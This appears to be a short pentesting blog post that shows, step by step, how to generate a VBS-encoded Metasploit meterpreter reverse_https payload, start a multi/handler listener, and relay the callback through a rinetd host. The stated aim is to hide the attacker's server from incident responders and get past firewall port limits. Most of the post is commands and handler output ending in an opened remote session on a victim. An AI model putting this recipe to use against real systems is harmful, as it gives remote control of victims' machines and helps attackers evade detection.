Tag: vbs

metasploit + rinetd fun

by on Apr.18, 2010, under Posts

A pentester might find his/her self in a situation where they might want to obfuscate the out going connection of their payload.

Now, my first idea was to use rinetd, but also a netcat relay came to mind as well. Nevertheless, my netcat relay did not work for this case.

Before I continue on, I should be explicit on what I want to do:

Create a payload that connects reversely to a host that acts a relay to the attackers host.

What are the benefits to this? Obfuscation of course. When the incidence response team takes action and possibly gets a copy of the payload, to reverse engineer it, they will notice that it connects to a host that may seem benign.
Also, the corporate firewall might only allow out going connections on specific ports and the pentester’s server might have to listen on some odd ball port due to ISP restrictions.

For redirecting I’ll be using rinetd. My three hosts are which as follows:

Host A = (Attacker)
Host B = (Relay host)
Host C = (Victim)

For my payload I’ll be using a new method implemented into metasploit, which is located here:

First lets create the payload:

msfpayload windows/meterpreter/reverse_https LHOST= LPORT=8080 R | msfencode -t loop-vbs -c 10 -o rineme.vbs

Next let’s setup our attacker’s handler on host
msf> use multi/handler
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8081
LPORT => 8081
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > exploit

[*] HTTPS listener started on
[*] Starting the payload handler..

Next I’ll set up the relay host to relay my connection.

rinetd -c config.conf

Where config.conf is simply: 8080 8081

This way, when the payload is executed and connects to the relay host ( on port 8080, the relay host will redirect the connection to the attacker’s host at at port 8081.

Once the payload gets executed on the victim host ( we should see something like this:

[*] Request received for /A0KET…

[*] Staging connection for target 0KET received…

[*] Patching Target ID 0KET into DLL

[*] Request received for /B0KET…

[*] Stage connection for target 0KET received…

[*] Meterpreter session 1 opened ( ->

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1..
meterpreter > ipconfig
Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address  :
Netmask    :

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:a1:52:61
IP Address  :
Netmask     :

More to come…

1 Comment :, , , , , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!